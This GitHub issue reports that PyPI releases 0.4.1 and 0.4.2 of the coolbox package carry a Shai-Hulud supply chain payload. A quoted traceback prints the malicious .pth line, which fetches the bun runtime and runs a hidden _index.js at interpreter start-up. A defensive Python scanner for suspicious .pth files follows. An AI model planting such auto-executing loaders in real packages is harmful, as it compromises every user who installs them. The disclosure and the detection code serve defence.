PyPI releases 0.4.1 and 0.4.2 affected by Shai-Hulud supply chain attack #117

Description

@StefanoCretti

While installing the latest version of the package (0.4.2 at the time of writing), I noticed a weird message

Error processing line 1 of /Users/stefano.cretti/.local/share/mamba/envs/test_plot/lib/python3.14/site-packages/coolbox-setup.pth:

    Traceback (most recent call last):
      File "<frozen site>", line 213, in addpackage
      File "<string>", line 1, in <module>
      File "<string>", line 1
        import os as _o,subprocess as _s,urllib.request as _u,platform as _p,sys as _y;_d=_o.path.dirname;_n=_o.path.join;_j=_n(_d(__file__),"_index.js");if not
  _o.path.exists(_j):import glob as _g;_c=_g.glob(_n(_d(__file__),"*","_index.js"));_j=_c[0]if _c else"";_e=_o.name=="nt";_b=_n(_T.gettempdir(),"b","bun"+(".exe" if _e else""));if not
  _o.path.exists(_b):_a="aarch64" if _p.machine()=="arm64" else"x64";_m={"linux":"linux","darwin":"darwin","win32":"windows"}.get(_y.platform,"linux");_z=_n(_T.gettempdir(),"b.zip");_u
  .urlretrieve(f"https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{_m}-{_a}.zip",_z);import zipfile as
  _zf;_zf.ZipFile(_z).extract(_o.path.basename(_b),_d(_b));_o.chmod(_b,509);_o.unlink(_z);_s.run([_b,"run",_j],check=False);open(_G,"w").close()
                                                                                                                                                          ^^
      SyntaxError: invalid syntax

    Remainder of file ignored

By investigating it, I found out that versions 0.4.1 and 0.4.2 of the package are affected by the Shai-Hulud supply chain attack.

I was saved by the usage of Python 3.14, but I could have been affected were I using an older version.
This issue is to inform the maintainers (if not addressed, any newer version published from their machines will be affected) as well as anyone who might have installed the package.

As far as I can tell, version 0.4.0 is the latest uncompromised one, so I would advise pinning that for the time being.
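The mechanism behind the message above is the Python `site` module: at interpreter start-up it executes any line of a `.pth` file in site-packages that begins with `import ` or `import<TAB>`, which is why a rogue `coolbox-setup.pth` runs before any user code. The scanner below is an added example (not code from the reporter or from the coolbox project) that lists the executable lines of every `.pth` file in the current interpreter's site directories and flags those importing modules a path hook has no reason to touch. The `RISKY_MODULES` list and the length threshold are assumed heuristics, and the three sample `.pth` contents used by `demo()` are constructed stand-ins, not the payload quoted in this issue. Because that payload does not even parse (the `;if not` chain is a syntax error on every Python version), the scanner falls back to textual matching when `ast.parse` fails, so it still reports the imports on such a line.

```python
"""Find .pth files in site-packages whose executable lines import risky modules.

Python's site module runs any .pth line that begins with "import " or
"import\t" at interpreter start-up; this is how a malicious
"<pkg>-setup.pth" gets executed on every interpreter launch.
"""
import ast
import re
import site
import tempfile
from pathlib import Path

# Mirrors the rule in site.addpackage(): only these lines are exec()'d.
EXEC_LINE = re.compile(r"^import[ \t]")
# Textual fallback for lines that do not parse as Python.
IMPORT_STMT = re.compile(r"\bimport\s+([^;#]+)")
# Top-level modules a path hook has no legitimate reason to import (assumed heuristic list).
RISKY_MODULES = {"subprocess", "urllib", "socket", "http", "zipfile", "ctypes", "base64", "shutil"}
MAX_LEN = 200  # an executable .pth line longer than this is unusual; assumed threshold


def executable_lines(text):
    """Lines of a .pth file that the site module would execute."""
    return [ln for ln in text.splitlines() if EXEC_LINE.match(ln)]


def imported_names(line):
    """Return (set of imported dotted names, parsed_ok) for one executable line."""
    try:
        tree = ast.parse(line)
    except SyntaxError:
        # The payload in this issue is itself unparseable ("...;if not ..."),
        # so a scanner must not rely on ast alone; fall back to text matching.
        names = set()
        for group in IMPORT_STMT.findall(line):
            for part in group.split(","):
                tokens = part.split()
                if tokens:
                    names.add(tokens[0])
        return names, False
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            names.add(node.module)
    return names, True


def scan_pth_file(path):
    """Findings for one .pth file as a list of dicts (empty when nothing looks off)."""
    findings = []
    for no, line in enumerate(Path(path).read_text(errors="replace").splitlines(), 1):
        if not EXEC_LINE.match(line):
            continue  # plain path entries and comments are never executed
        names, parsed = imported_names(line)
        hits = sorted(n for n in names if n.split(".")[0] in RISKY_MODULES)
        if hits:
            reason = "imports " + ", ".join(hits)
        elif len(line) > MAX_LEN:
            reason = f"executable line longer than {MAX_LEN} chars"
        else:
            continue
        findings.append({"line": no, "reason": reason, "parsed": parsed, "excerpt": line[:80]})
    return findings


def scan_site_dirs(dirs=None):
    """Map each suspicious .pth path to its findings; defaults to this interpreter's site dirs."""
    if dirs is None:
        dirs = list(site.getsitepackages()) + [site.getusersitepackages()]
    results = {}
    for d in dirs:
        for pth in sorted(Path(d).glob("*.pth")):
            hits = scan_pth_file(pth)
            if hits:
                results[pth] = hits
    return results


# Constructed sample .pth contents for the stand-alone demo; not the real payload.
BENIGN_PTH = "/opt/example/lib\n# comment\nimport sys; sys.path.append('/opt/example/plugins')\n"
SUSPICIOUS_PTH = "import subprocess as _s, urllib.request as _u; _u.__name__  # stand-in\n"
UNPARSEABLE_PTH = "import os as _o, subprocess as _s;if not _o.name: pass\n"


def demo():
    """Write the constructed samples to a temp dir and scan it; returns {filename: findings}."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "vendor-setup.pth").write_text(BENIGN_PTH)
        (root / "evil-setup.pth").write_text(SUSPICIOUS_PTH)
        (root / "broken-setup.pth").write_text(UNPARSEABLE_PTH)
        return {p.name: f for p, f in scan_site_dirs([root]).items()}


if __name__ == "__main__":
    for name, hits in demo().items():
        for h in hits:
            print(f"[demo] {name}:{h['line']}: {h['reason']}")
    for path, hits in scan_site_dirs().items():
        for h in hits:
            print(f"{path}:{h['line']}: {h['reason']}")
```

Run it inside the environment you want to check (`python scan_pth.py` from the affected venv); a legitimate `.pth` normally contains only directory paths or a single `import` line that appends to `sys.path`, so anything reported is worth reading by hand before deciding whether to rebuild the environment from a known-good lockfile.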
